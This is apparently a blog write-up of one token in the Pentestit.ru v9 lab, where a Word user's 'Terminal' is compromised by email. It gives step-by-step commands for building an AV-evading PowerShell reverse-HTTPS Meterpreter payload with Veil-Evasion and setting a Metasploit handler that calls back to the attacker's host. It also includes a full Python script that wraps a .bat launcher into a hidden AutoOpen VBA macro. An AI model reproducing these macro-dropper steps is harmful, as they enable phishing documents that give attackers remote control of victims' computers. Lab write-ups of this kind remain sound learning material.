Pentestit.ru V.9 (Part 13) – Token Terminal
So, here we are again, almost at the end of the Pentestit.ru lab v9.
This token was really hard, especially because you had to keep in mind everything you had done to get here, and that everything has its own purpose.
Remember the reply email we were getting when going after the Email Token?
That is our way into the Terminal token, and to be honest, I would have had no idea if I hadn't looked at the WriteUp 😛
So, let’s go into it:
So it seems that r.diaz might be on a "Terminal" and is allowed to open Microsoft Office documents; that might give us a door into his "Terminal" 😀
So let's get things started, shall we?
So, we need to use a macro to put a payload into the document. But we must be aware that we may need to bypass an AV system. To do so we will use a tool known as Veil-Evasion:
First let's download it.
Make sure you run the installer as root, otherwise you will have problems installing python27. (I had them 😉 )
/opt# git clone https://github.com/Veil-Framework/Veil-Evasion.git
/opt/Veil-Evasion/setup# ./setup.sh
After installing Veil-Evasion and all its dependencies, we can create our payload:
/opt/Veil-Evasion# ./Veil-Evasion.py
 Veil-Evasion | [Version]: 2.28.2
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

Main Menu

	51 payloads loaded

Available Commands:

	use		Use a specific payload
	info		Information on a specific payload
	list		List available payloads
	update		Update Veil-Evasion to the latest version
	clean		Clean out payload folders
	checkvt		Check payload hashes vs. VirusTotal
	exit		Exit Veil-Evasion

[menu>>]:
Now we have to select our payload; we opted for payload 23 (powershell/meterpreter/rev_https). You can issue the list command to see all the available payloads.
Why this one? Because the inside network 192.168.X.X can only reach "our" VPN network over HTTPS on port 443, so the callback has to go out over 443, and a reverse HTTPS stager does exactly that.
[menu>>]: use 23
…
[powershell/meterpreter/rev_https>>]: set LHOST 10.10.160.234
[i] LHOST => 10.10.160.234
[powershell/meterpreter/rev_https>>]: set LPORT 443
[i] LPORT => 443
[powershell/meterpreter/rev_https>>]: generate
Now we need to convert the generated .bat into a macro we can put in the Word document.
After some research I found a tool known as macro_safe. Download it here
Now we just run it to get our macro in its final form:
~/pentestit.ru/terminal$ ./macro_safe.py /usr/share/veil-output/source/terminalpayload.bat macroterminalworddoc
OK, we are almost done. Now open Microsoft Word on a Windows box and add the macro:
Go to the Developer tab -> Visual Basic (Alt+F11) and paste your macro into ThisDocument.
Since this macro has to run automatically when the document is opened, rename the procedure to AutoOpen(), because this is a Word document; for an Excel workbook it would be Auto_Open(). Save the file in a macro-enabled format (.doc or .docm; a .docx cannot carry macros), and keep in mind that Word will only run it once the recipient clicks "Enable Content" or has macro security turned down.
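To make the .bat-to-macro step concrete, here is an added illustration in Python of what that conversion does. It is my own code, not macro_safe's or Veil's: it pulls the powershell.exe command line out of a (constructed) .bat, splits it into short string chunks that VBA concatenates at run time, and wraps it in a Sub named AutoOpen (or Auto_Open for Excel) that launches the rebuilt command hidden via Shell. The sample .bat, the placeholder payload and the 50-character chunk size are assumptions for the example; a real Veil launcher is much longer and may need the extractor adjusted.

```python
"""Turn a Veil-style .bat launcher into a VBA AutoOpen macro.

Illustrative reimplementation of the idea behind macro_safe: the long
PowerShell command line is split into short string chunks that VBA
concatenates at run time, then handed to Shell(). The sample input below
is constructed, not real Veil output.
"""
import re
from typing import List

# Constructed stand-in for the .bat that Veil writes. A real one carries a
# far longer -Command / -EncodedCommand payload; the structure is what matters.
SAMPLE_BAT = (
    "@echo off\n"
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass "
    "-Command \"$p = 'CONSTRUCTED_PLACEHOLDER'; Write-Host $p\"\n"
)

# Matches the chunk lines build_macro() emits, e.g.  cmd = cmd & "..."
_CHUNK_LINE = re.compile(r'^\s*(\w+) = \1 & "(.*)"\s*$')


def extract_command(bat_text: str) -> str:
    """Return the first powershell.exe invocation found in the .bat (one line)."""
    for line in bat_text.splitlines():
        if re.search(r"\bpowershell(\.exe)?\s", line, re.IGNORECASE):
            return line.strip()
    raise ValueError("no powershell invocation found in .bat")


def split_chunks(text: str, size: int) -> List[str]:
    """Cut text into pieces of at most `size` characters, order preserved."""
    if size < 1:
        raise ValueError("chunk size must be >= 1")
    return [text[i:i + size] for i in range(0, len(text), size)]


def vba_literal(s: str) -> str:
    """Quote s as a VBA string literal; an embedded double quote is doubled."""
    return '"' + s.replace('"', '""') + '"'


def build_macro(command: str, proc_name: str = "AutoOpen",
                chunk: int = 50, var: str = "cmd") -> str:
    """Emit a Sub that rebuilds `command` chunk by chunk and runs it hidden.

    proc_name is AutoOpen for Word and Auto_Open for Excel. Chunking keeps
    every VBA line well under the 1023-character physical line limit and
    avoids one long, easily signatured string literal.
    """
    lines = [f"Sub {proc_name}()", f"    Dim {var} As String", f'    {var} = ""']
    for piece in split_chunks(command, chunk):
        lines.append(f"    {var} = {var} & {vba_literal(piece)}")
    lines.append(f"    Shell {var}, vbHide")   # vbHide = no visible window
    lines.append("End Sub")
    return "\n".join(lines) + "\n"


def reassemble(macro: str) -> str:
    """Parse the chunk lines back out of a macro; a round-trip self-check."""
    parts = []
    for line in macro.splitlines():
        m = _CHUNK_LINE.match(line)
        if m:
            parts.append(m.group(2).replace('""', '"'))
    return "".join(parts)


if __name__ == "__main__":
    print(build_macro(extract_command(SAMPLE_BAT)))
```

Run it and paste the printed Sub into ThisDocument; reassemble() lets you confirm the chunks really concatenate back to the original command before you trust the macro on a target.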
We are almost done; now we just need to set up our listener and send our infected Word document:
/pentestit.ru/terminal$ sudo msfconsole -r /usr/share/veil-output/handlers/terminalpayload_handler.rc
[*] Processing /usr/share/veil-output/handlers/terminalpayload_handler.rc for ERB directives.
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> use exploit/multi/handler
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set LHOST 10.10.160.234
LHOST => 10.10.160.234
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set LPORT 443
LPORT => 443
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set ExitOnSession false
ExitOnSession => false
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://10.10.160.234:443
[*] Starting the payload handler...
msf exploit(handler) >
Note: we invoke the handler file that Veil created in /usr/share/veil-output/handlers/ by calling msfconsole with the -r option and the handler name. That configures the handler for us, and ExitOnSession false keeps it listening after the first session comes in.
Now we just need to send the Word document:
Just wait a while and there we go:
We interact with the session:
Let's get some information, like where we are:
Now we must search for our token:
Then we went to the Desktop directory, and there it was:
There you go: Token terminal – **i***l*
Hope you guys have enjoyed this one as much as I did. It was really a good learning experience, and it opened my mind to a new kind of attack, which I ended up exploring.
Note: the method above doesn't work on the most recent versions of Microsoft Office; for those there are other methods 😉 After successfully taking this token I ended up spending a lot of time trying different ways of adding macros and bypassing even the most recent AV. Upon request I might upload a tutorial on how to do so, but think about it…